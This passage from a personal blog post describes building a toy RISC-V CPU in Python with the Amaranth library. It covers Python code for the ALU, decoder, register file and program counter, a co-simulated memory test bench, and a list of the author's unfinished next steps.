        # operation, e.g. "add" or "xor", from decoder
        self.i_funct3 = Signal(3)

        # sub-operation, e.g. "sub" for "add", from decodert
        self.i_funct7 = Signal(7)

        # value of register 1
        self.i_data1 = SignedSignal(32)

        # value of register 2 or immediate
        self.i_data2 = SignedSignal(32)

        # computation result
        self.o_result = SignedSignal(32)

    def elaborate(self, _: Platform) -> Module:
        m = Module()

        # this ALU also implements branch logic
        with m.If(self.i_is_branch == 0):
            # normal ALU
            with m.Switch(self.i_funct3):
                with m.Case(FUNCT3_OP_XOR):
                    m.d.comb += self.o_result.eq(self.i_data1 ^ self.i_data2)
                with m.Case(FUNCT3_OP_SLL):
                    shift_amount = self.i_data2[0:5]
                    m.d.comb += self.o_result.eq(
                        self.i_data1.as_unsigned() << shift_amount)
                # ...

In this snippet you can see how Amaranth is really a code generator: Instead of using the normal 

switch
and 
if
 statements, which control Python flow, you have to use the 
m.Switch
 etc. methods on the module.

Decoder 

Provide all necessary signals to control execution.

class InstructionDecoder(Elaboratable):
    def __init__(self):
        self.i_instruction = Signal(32)
        self.i_instruction_address = Signal(32)

        # select signals for register file
        self.o_rs1 = Signal(5)
        self.o_rs2 = Signal(5)
        self.o_rd = Signal(5)
        self.o_rd_we = Signal(1)

        # ALU / LSU operations
        self.o_funct3 = Signal(3)
        self.o_funct7 = Signal(7)

        # immediate value
        self.o_imm = SignedSignal(32)

        # control signals
        self.o_invalid = Signal(1)
        self.o_has_imm = Signal(1)
        self.o_is_branch = Signal(1)
        self.o_is_memory = Signal(2)

    def elaborate(self, _: Platform) -> Module:
        m = Module()

        m.d.comb += self.o_invalid.eq(0)
        m.d.comb += self.o_is_branch.eq(0)

        opcode = self.i_instruction[0:7]

        with m.Switch(opcode):
            with m.Case(OPCODE_OP_IMM):
                # rd = rs1 $OP imm
                # use ALU with immediate
                m.d.comb += [
                    self.o_rd.eq(self.i_instruction[7:12]),
                    self.o_rd_we.eq(1),
                    self.o_funct3.eq(self.i_instruction[12:15]),
                    self.o_rs1.eq(self.i_instruction[15:20]),
                    self.o_rs2.eq(0),
                    self.o_imm.eq(self.i_instruction[20:32]),
                    self.o_has_imm.eq(1),
                    self.o_funct7.eq(0),
                ]
            # ...

Register File 

Implement 32 registers. Special case: register 

x0
 is hard-wired to zero, by not allowing writes to it.

I’m not sure if this is the best implementation, but it works well in simulation so far.

class RegisterFile(Elaboratable):
    def __init__(self):
        self.sync = ClockDomain("sync")

        self.i_select_rs1 = Signal(5)
        self.i_select_rs2 = Signal(5)
        self.i_select_rd = Signal(5)

        self.i_we = Signal(1)
        self.i_data = SignedSignal(32)

        self.o_rs1_value = SignedSignal(32)
        self.o_rs2_value = SignedSignal(32)

        self.registers = Signal(32 * 32)

        self.ports = [self.sync, self.i_select_rs1, self.i_select_rs2, self.i_select_rd, self.i_data, self.i_we]

    def elaborate(self, _: Platform) -> Module:
        """
        on clock edge if i_we is set: stores i_data at reg[i_select_rd]
        combinationally returns register values
        """

        m = Module()

        m.d.comb += [
            self.o_rs1_value.eq(self.registers.word_select(self.i_select_rs1, 32)),
            self.o_rs2_value.eq(self.registers.word_select(self.i_select_rs2, 32)),
        ]

        with m.If((self.i_we == 1) & (self.i_select_rd != 0)):
            m.d.sync += self.registers.word_select(self.i_select_rd, 32).eq(self.i_data)

        return m

Program Counter 

The simplest component: we start executing programs at 0x1000 and then go to the next instruction. The decoder computes offset based on the instruction to allow both absolute and relative jumps.

class ProgramCounter(Elaboratable):
    def __init__(self):
        self.sync = ClockDomain("sync")
        self.i_offset = SignedSignal(32)
        self.o_instruction_address = Signal(32, reset=0x1000)

        self.ports = [self.o_instruction_address]

    def elaborate(self, _: Platform) -> Module:
        m = Module()

        m.d.sync += self.o_instruction_address.eq(self.o_instruction_address + self.i_offset)

        return m

Load Store Unit 

I’m co-simulating this part, so there is no implementation. Also simulating even small amounts of memory turned out to be way to slow. I hope to find more time in the future to complete this part of the project. And then also run it with real memory on an FPGA instead of just in simulation.

But let’s at least discuss the most interesting aspect of memory: Memory is usually very slow compared to the CPU. So the CPU has to be stalled, i.e. wait, while we are waiting for the memory to execute the read or write. In my design I have defined an 

o_done
 signal. This signal tells the control unit to not advance the program counter until the result is available. Not sure if this is the best approach, but it works for now.

class LoadStoreUnit(Elaboratable):
    def __init__(self):
        self.sync = ClockDomain("sync")

        # from decoder, not in spec, internal control signals
        self.i_lsu_mode = Signal(2)

        # from decoder, memory operation
        self.i_funct3 = Signal(3)

        # address
        self.i_address_base = Signal(32)
        self.i_address_offset = SignedSignal(12)

        # reading / writing
        self.i_data = Signal(32)
        self.o_data = Signal(32)

        # 
        self.o_done = Signal(1)

    def elaborate(self, _: Platform) -> Module:
        m = Module()

        # empty by design: this is co-simulated

        return m

Tieing it all together and testing it 

The control unit connects all modules, as described in the simplified diagram above. And uses the control logic from the decoder to correctly advance the program counter.

Instead of showing the boring glue code, here’s how I’m testing the CPU via simulation. The assembly program is designed to set registers to certain values, that can be checked afterwards. It does not follow any ABI constraints.

def test_cpu():
    dut = CPU()
    sim = Simulator(dut)

    rom = [
        0x02A00093,  # addi x1 x0 42   --> x1 = 42
        0x00100133,  # add x2 x0 x1    --> x2 = 42
        0x123451B7,  # lui x3 0x12345  --> x3 = 0x12345
        0x00208463,  # beq x1 x2 8     --> skip the next instruction
        0x00700193,  # addi x3 x0 7    [skipped]
        0x00424233,  # xor x4 x4 x4    --> x4 = 0
        0x00A00293,  # addi x5 x0 10   --> x5 = 10
        0x00120213,  # addi x4 x4 1    --> x4 = x4 + 1
        0x00520463,  # beq x4 x5 8     --> skip the next instruction
        0xFF9FF36F,  # jal x6 -8       --> jump up; effectively setting x4 = 10
                     #                     also setting x6 = pc + 4
        0x000013B7,  # lui x7 0x1      --> x7 = 0x1000
        0x03438467,  # jalr x8 x7 52   --> skip the next instruction
        0x00634333,  # xor x6 x6 x6    [skipped]
        0x100004B7,  # lui x9 0x10000  --> x9 = 0x1000_0000
        0x0324A503,  # lw x10 50 x9    --> x10 = *((int32*)(mem_u8_ptr[x9 + 0x32]))
        0x00000013,  # nop
        0,
    ]

    ram = [0 for x in range(128)]
    ram[0x32 + 3], ram[0x32 + 2], ram[0x32 + 1], ram[0x32] = 0xC0, 0xFF, 0xEE, 0x42

    done = [0]

    def bench():
        assert (yield dut.o_tmp_pc) == 0x1000

        while True:
            instr_addr = yield dut.o_tmp_pc
            print("instr addr: ", hex(instr_addr))
            rom_addr = (instr_addr - 0x1000) // 4

            if rom[rom_addr] == 0:
                done[0] = 1
                print("bench: done.")
                break

            print("instr: ", hex(rom[rom_addr]))

            yield dut.i_tmp_instruction.eq(rom[rom_addr])
            yield Settle()

            assert (yield dut.decoder.o_invalid) == False

            yield Tick()
            yield Settle()

        read_reg = lambda x: dut.registers.registers.word_select(x, 32)

        assert (yield read_reg(1)) == 42
        assert (yield read_reg(2)) == 42
        assert (yield read_reg(3)) == 0x12345000
        assert (yield read_reg(5)) == 10
        assert (yield read_reg(4)) == 10
        assert (yield read_reg(6)) == 0x1000 + 4 * rom.index(0xFF9FF36F) + 4
        assert (yield read_reg(7)) == 0x1000
        assert (yield read_reg(8)) == 0x1000 + 4 * rom.index(0x03438467) + 4
        assert (yield read_reg(9)) == 0x1000_0000
        assert (yield read_reg(10)) == 0xC0FFEE42

        yield Passive()

    def memory_cosim():
        lsu = dut.lsu

        was_busy = False

        while not done[0]:
            lsu_mode = yield lsu.i_lsu_mode
            if lsu_mode == INTERNAL_LSU_MODE_DISABLED:
                was_busy = False
                yield lsu.o_data.eq(0)
                yield lsu.o_done.eq(0)
            elif lsu_mode == INTERNAL_LSU_MODE_LOAD and was_busy is False:
                was_busy = True
                base = yield lsu.i_address_base
                offset = yield lsu.i_address_offset
                addr = base + offset
                funct3 = yield lsu.i_funct3
                print(f"memory read request: addr={hex(addr)}")

                yield Tick()  # a read takes a while
                yield Tick()
                yield Tick()

                ram_offset = addr - 0x10000000
                if funct3 == FUNCT3_LOAD_W:
                    value = (ram[ram_offset + 3] << 24) | (ram[ram_offset + 2] << 16) | (ram[ram_offset + 1] << 8) | ram[ram_offset]
                # ...

                yield lsu.o_data.eq(value)
                yield lsu.o_done.eq(1)
            # ...

            yield Tick()
        print("memory_cosim: done.")

        yield Passive()

    sim.add_clock(1e-6)
    sim.add_process(bench)
    sim.add_process(memory_cosim)
    sim.run()

Conclusion 

My development time ran out before I completed the project, so no game of life on my toy CPU for now. So what’s missing?

  • memory mapped I/O, so that instead of keeping the LEDs in memory, signals / pins of the CPU are used,
  • adding support for a few missing read / write operations to the memory controller (read byte, write byte),
  • integrating the emulator and simulator, re-using the existing debugger user interface,
  • and then likely spending some time on debugging,
  • maybe porting the simulator to Verilator or another framework to make it fast enough.

But I thought having a blog post is much better than completing this experiment now. I hope to find time in the future to again work on this, finally run game of life on my CPU and actually run it in an FPGA. That would be fun.

But the best part is really: I’ve learned so much as you’ve read. Try it yourself. Thank you for reading 🙂

Full source code 

You can find my source code at https://github.com/fnoeding/fpga-experiments . It’s not as clean as the snippets above, but I hope it provides additional context if you’d like to dive deeper.

Additional Material 

If you want to learn more I’ve collected some links that helped me below: